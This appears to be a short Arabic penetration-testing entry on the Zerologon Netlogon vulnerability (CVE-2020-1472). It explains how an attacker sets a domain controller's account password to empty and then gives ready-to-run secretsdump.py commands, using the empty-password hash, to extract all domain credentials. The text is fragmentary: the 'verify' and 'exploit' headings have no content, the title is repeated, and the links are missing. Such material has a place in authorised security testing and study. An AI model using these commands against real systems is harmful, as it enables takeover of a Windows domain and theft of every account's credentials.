
[CVE-2020-1472] تصعيد الامتياز لبروتوكول Netlogon عن بُعد (MS-NRPC) (Zerologon)
[CVE-2020-1472] تصعيد الامتيازات عبر بروتوكول Netlogon عن بُعد (MS-NRPC) (Zerologon)
يستغل الهجوم الموضح هنا ثغرات في بروتوكول المصادقة التشفيري (الاستخدام غير الآمن لـ AES-CFB8) الذي يُثبت صحة وهوية جهاز مرتبط بالمجال إلى وحدة تحكم المجال (DC). بسبب الاستخدام غير الصحيح لوضع تشغيل AES، من الممكن تزوير هوية أي حساب جهاز (بما في ذلك حساب DC نفسه) وتعيين كلمة مرور فارغة (ببساطة عن طريق إرسال عدد من رسائل Netlogon حيث يتم ملء الحقول المختلفة بالأصفار) لذلك الحساب في المجال. يمكن بعد ذلك استخدام هذا للحصول على بيانات اعتماد مسؤول المجال ثم استعادة كلمة مرور DC الأصلية.
من أجل التحقق من CVE-2020-1472
من أجل استغلال CVE-2020-1472
ثم، قم بتشغيل أحد الأوامر التالية
مثال الصيغة 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
مثال الصيغة 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

المقال الأصلي متاح هنا
المستودع الأصلي الذي يحتوي على نص اختبار بايثون متاح هنا
المستودع الأصلي الذي يحتوي على نص استغلال بايثون متاح هنا